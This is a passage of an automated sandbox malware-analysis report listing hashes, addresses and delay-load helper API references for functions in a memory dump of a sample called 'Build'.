Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cffe0369203f881a8b586314264f9a4ed76f2cd4e3c2ae1207bf11d24d4db039
Instruction ID: 070c53dcd4368d4f3c0b5f8b3d2191706a12606aaa5020d4410cf25431a7b740
Opcode Fuzzy Hash: cffe0369203f881a8b586314264f9a4ed76f2cd4e3c2ae1207bf11d24d4db039
Instruction Fuzzy Hash: 2FB012C639C200AD368F7168ED02D77010CC0C0B10330C5BEF405C4041E4411C0D0331

Function 00380A05 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003809FC

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 729b0733253d81d1ec9c58901c7b5d501d67d1e2c3901a12073eeaa1649baf72
Instruction ID: 47133a1d5f417aeed84ef37319fabc7b6786dc8e486333d56c39697322459822
Opcode Fuzzy Hash: 729b0733253d81d1ec9c58901c7b5d501d67d1e2c3901a12073eeaa1649baf72
Instruction Fuzzy Hash: 4EB012C639C300AD378F7169EC02D77010CD0C0B10330867EF405C4181E4411C4C0331

Function 003806C4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fcd23a1777af15a2d1c979164791b96ec2f54e6ff9eaa28ad3a6d672dbecd00d
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: fcd23a1777af15a2d1c979164791b96ec2f54e6ff9eaa28ad3a6d672dbecd00d
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 0038073C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 82d0b3f00afc91c91ef702bd683735eff6412ee9768e9bad621fb49a3f357818
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: 82d0b3f00afc91c91ef702bd683735eff6412ee9768e9bad621fb49a3f357818
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 00380728 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 69992e238debb9bbaa6bd227e69edeccc97762e01c24edae22d57f40831dccf2
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: 69992e238debb9bbaa6bd227e69edeccc97762e01c24edae22d57f40831dccf2
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 0038070A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3b44c542b6263524349789eb7fc4556217835c2c746912733491bde44ce1d08a
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: 3b44c542b6263524349789eb7fc4556217835c2c746912733491bde44ce1d08a
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 00380778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: df0beacf65a64bfe3e988232a38b7752dfdc5a98cfabb1925fe8501c6db7483b
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: df0beacf65a64bfe3e988232a38b7752dfdc5a98cfabb1925fe8501c6db7483b
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 0038076E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c12e0f16e9af6f7b7273161b301278713b1445802f4477b48bf02599d563ae8e
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: c12e0f16e9af6f7b7273161b301278713b1445802f4477b48bf02599d563ae8e
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 0038075A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61f74040b4322b67ed4b43f1b38f6bbecd307a9c113418e669ec48a952a161ab
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: 61f74040b4322b67ed4b43f1b38f6bbecd307a9c113418e669ec48a952a161ab
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 00380750 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 76400c2bffd39e47833a6e8357caf188eb727e7f745a0c373f4420b36a4449e6
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: 76400c2bffd39e47833a6e8357caf188eb727e7f745a0c373f4420b36a4449e6
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 00380746 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 442e0fb4875adc587645f103abad1749412233a22932a88d25266756a9a2abc0
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: 442e0fb4875adc587645f103abad1749412233a22932a88d25266756a9a2abc0
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 00380782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fb27f125c29c4fe9a22f010cd40e5ed80921ab9ffbe020ffd4b739d9a99fc426
Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
Opcode Fuzzy Hash: fb27f125c29c4fe9a22f010cd40e5ed80921ab9ffbe020ffd4b739d9a99fc426
Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230

Function 003808BF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f350084b74fc684de683e22f76fc40c6e82aaa84a17bdc940665a645b00e4c4c
Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
Opcode Fuzzy Hash: f350084b74fc684de683e22f76fc40c6e82aaa84a17bdc940665a645b00e4c4c
Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671

Function 003808B5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9f9a369e39bce8a68fb3680b7e7481b3f10aa099e3a8b39f893dc69e5a49b670
Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
Opcode Fuzzy Hash: 9f9a369e39bce8a68fb3680b7e7481b3f10aa099e3a8b39f893dc69e5a49b670
Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671

Function 0038089A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fde2984c6b64477dace924b8c639ee0dc71c9df2d617b829b2b4632dc874b97
Instruction ID: bed3fb95f80094cd69d91697bfd4e073cfadcca57eb3a6f8c2415090eafaabef
Opcode Fuzzy Hash: 0fde2984c6b64477dace924b8c639ee0dc71c9df2d617b829b2b4632dc874b97
Instruction Fuzzy Hash: ACA001962A9312BC369F72A5AD06C7A221CD4C0B2633189AEF449D8486A884288D5671

Function 003808F1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8f75d99f472a1fdd0a8b8bb17c97e5d490323afb96c0192da4b8fb214e777103
Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
Opcode Fuzzy Hash: 8f75d99f472a1fdd0a8b8bb17c97e5d490323afb96c0192da4b8fb214e777103
Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671

Function 003808E7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
